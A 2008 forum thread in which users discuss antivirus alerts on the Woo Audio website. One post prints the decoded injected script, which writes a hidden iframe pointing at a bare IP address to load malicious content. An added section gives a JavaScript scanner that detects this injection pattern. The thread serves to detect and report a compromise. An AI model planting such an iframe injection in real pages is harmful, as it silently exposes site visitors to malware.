Woo Audio site - Compromised?
Mar 30, 2008 at 11:12 AM Thread Starter Post #1 of 21

DoubleEs

Hi

Not sure if this is the right place to post this but has anyone been to the Woo Audio site lately?

The reason I'm asking is because for the last few days my AV has been going nuts every time I try to go there.

My AV (Kaspersky) throws up an alert saying Trojan_Downloader.HTML.Agent.ij detected and blocks me from going there.

I have several PCs here but they're all running Kaspersky so I don't know if it's a false positive.

Have any of you guys been to the WA site in the past few days running a different AV and not getting any alert?
 
Mar 30, 2008 at 11:42 AM Post #2 of 21
Might be. If you look at the page source code, there's some kind of script added after the end html tag that could be a virus of some kind.
 
Mar 30, 2008 at 12:04 PM Post #3 of 21
After unescaping the string, the following is the result:

Code:
window.status='Done';document.write('<iframe name=7f046febc98 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*182972)+'84e1e\' width=307 height=596 style=\'display: none\'></iframe>')

Looks like it creates an iframe on the page that references the site 58.65.232.33; I'd say it's highly likely that Woo Audio has no idea that this was added to their site, and that it's a trojan.
 
Mar 30, 2008 at 12:07 PM Post #4 of 21
Update: I found a decoder and the script at the bottom of all their pages contains an iframe that loads another site, which presumably contained a virus or trojan of some kind. The page that was loaded is now gone. I've sent a message using the Woo Audio contact page about it. Possibly the server hosting the site was compromised.

Edit: Nebby beat me to it.
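
An added example, not part of the original thread: a static check in JavaScript (Node) for the pattern the posts above describe, a script placed after the closing html tag whose unescaped string writes a hidden iframe pointing at a bare IP address. The sample page, the finding names and the documentation address 192.0.2.10 are constructed for illustration.

```javascript
// Added example: static check for the injection pattern described in this thread.
// Nothing is executed; escapes are decoded as text only.
const encode = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');

// Constructed sample (not the real page); 192.0.2.10 is a documentation address.
const SAMPLE_PAGE =
  '<html><body>Amplifiers</body></html>\n<script>document.write(unescape(\'' +
  encode("<iframe src='http://192.0.2.10/x' width=307 height=596 style='display: none'></iframe>") +
  '\'))</script>';

// Decode %XX and %uXXXX the way the legacy unescape() would.
function decodeEscapes(text) {
  return text.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Return the list of suspicious traits found in a saved copy of a page.
function scanPage(html) {
  const findings = new Set();
  // Anything after the last </html> is outside the document proper.
  const end = html.toLowerCase().lastIndexOf('</html>');
  if (end !== -1 && /<script\b/i.test(html.slice(end + 7))) {
    findings.add('script-after-html-close');
  }
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    const decoded = decodeEscapes(body);
    if (/unescape\s*\(/i.test(body) && decoded !== body) findings.add('escaped-payload');
    for (const [tag] of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      // Quotes may be backslash-escaped inside a document.write() string.
      const src = (tag.match(/src\s*=\s*\\?['"]?([^\s'">\\]+)/i) || [])[1] || '';
      if (/display\s*:\s*none/i.test(tag)) findings.add('hidden-iframe');
      if (/^https?:\/\/\d{1,3}(\.\d{1,3}){3}(?=[:\/]|$)/i.test(src)) findings.add('iframe-src-raw-ip');
    }
  }
  return [...findings];
}

console.log(scanPage(SAMPLE_PAGE));
```

Run against saved copies of a site's pages, a non-empty result on pages that previously scanned clean is a reason to compare the file against a known-good version.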
 
Mar 30, 2008 at 12:20 PM Post #6 of 21
Well Currawong, I beat you to the forum post, but you beat me to the email to them.

Btw, hello fellow Japan Head-fi'er! Shame you're on the other end of the country.
 
Mar 31, 2008 at 1:14 AM Post #9 of 21
Yeah, Macs rule!! :6)
 
Mar 31, 2008 at 3:15 AM Post #12 of 21
Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...
 
Mar 31, 2008 at 3:33 AM Post #13 of 21
Quote:

Originally Posted by Sovkiller
Not sure where the hell you got this message from but I was right now on the Woo site and browsed all pages with no problems, and I have a PC, with NOD32, and no problems at all...


The questionable line of code has already been removed from their site.
 
Mar 31, 2008 at 3:39 AM Post #14 of 21
Thank God!!! Good to know!!!
 
Mar 31, 2008 at 3:43 AM Post #15 of 21
Scary stuff, I've also been browsing wooaudio within the past week or so and I didn't get any anti-virus pop-ups (running AVG here). I'm using Firefox with the NoScript extension though, maybe that would've prevented the code from being run in the first place?
 
